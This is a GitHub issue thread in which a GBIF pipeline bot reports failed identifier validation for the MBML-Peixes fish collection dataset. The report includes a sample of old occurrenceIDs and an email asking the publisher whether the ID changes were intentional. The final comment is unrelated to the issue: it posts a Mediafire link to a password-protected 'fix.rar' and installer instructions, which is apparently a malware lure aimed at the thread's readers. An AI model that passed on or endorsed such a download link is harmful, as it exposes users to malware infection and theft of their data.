### ISSUE TITLE
Identifiers validation failed for dataset MBML-Peixes - Coleção de Peixes

### ISSUE THREAD

**Issue by gbif-pipelines** [gbif/ingestion-management#1527]
Identifier validation failed for the dataset [MBML-Peixes - Coleção de Peixes](https://registry.gbif.org/dataset/a9317b52-6c43-452c-87d5-ea43e4773058):
- Crawler attempt: 442
- Publishing organization: [Instituto Nacional da Mata Atlântica](https://registry.gbif.org/organization/667644b9-7b93-4892-80c7-c4271735c515)
- Publishing country: BRAZIL
- Installation: [speciesLink Network / INCT-HVFF IPT](https://registry.gbif.org/installation/b38ff2b7-c8af-454e-b5af-ee760f0d5bca)
- Number of occurrences indexed for this dataset at the time of the issue: 14526
- Cause: GBIF ID problems exceed 50% threshold: 100% duplicates; 14527 total records; 14527 absent records
- Pipelines execution steps: [http://api.gbif.org/v1/pipelines/history/execution/4084431/step](http://api.gbif.org/v1/pipelines/history/execution/4084431/step)

```
New IDs sample:


```

```
Old IDs sample:

BRA:MBML:MBML-PEIXES:14420
BRA:MBML:MBML-PEIXES:14421
BRA:MBML:MBML-PEIXES:14422
BRA:MBML:MBML-PEIXES:14423
BRA:MBML:MBML-PEIXES:14424
BRA:MBML:MBML-PEIXES:14425
BRA:MBML:MBML-PEIXES:14426
BRA:MBML:MBML-PEIXES:14427
BRA:MBML:MBML-PEIXES:14428
BRA:MBML:MBML-PEIXES:14461
```

<details>
<summary>Publisher email</summary>

Hello,

I am contacting you from the GBIF Secretariat about a dataset published by the [MBML-Peixes - Coleção de Peixes](https://registry.gbif.org/dataset/a9317b52-6c43-452c-87d5-ea43e4773058) : https://doi.org/10.15468/l4q0fn.
We noticed that the occurrenceIDs were changed. We have temporarily paused the ingestions of this dataset.

As you might already know, when an occurrence record has a new occurrenceID for a given dataset, our system considers it to be a new occurrence.
This means that it will be given a new gbifid and a new occurrence URL (like this one: https://www.gbif.org/occurrence/1252968762) and the old gbifid and URL will be deprecated.

In this case, this means that the occurrence URLs would be deprecated when ingesting the newest versions of these datasets.

We would like to check with you if those changes were intentional. Do you know if this is the case?
Please let us know, thanks! We are happy to resume the dataset ingestion.

Note that some users rely on those occurrence URLs and gbifids (like https://bionomia.net for example). In an attempt to improve
the stability of the occurrence URLs and gbifids, we have implemented a warning system to detect these type of changes in datasets (see this news item).
If the data publisher can provide us with a list of old and new occurrenceIDs per record, we can avoid the identifier and URL changes. Could that be an option?

Please let us know if you have any question. Thanks!

All the best,

</details>

You can skip/fix identifier validation using [the registry UI](https://registry.gbif.org/dataset/a9317b52-6c43-452c-87d5-ea43e4773058/ingestion-history).

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
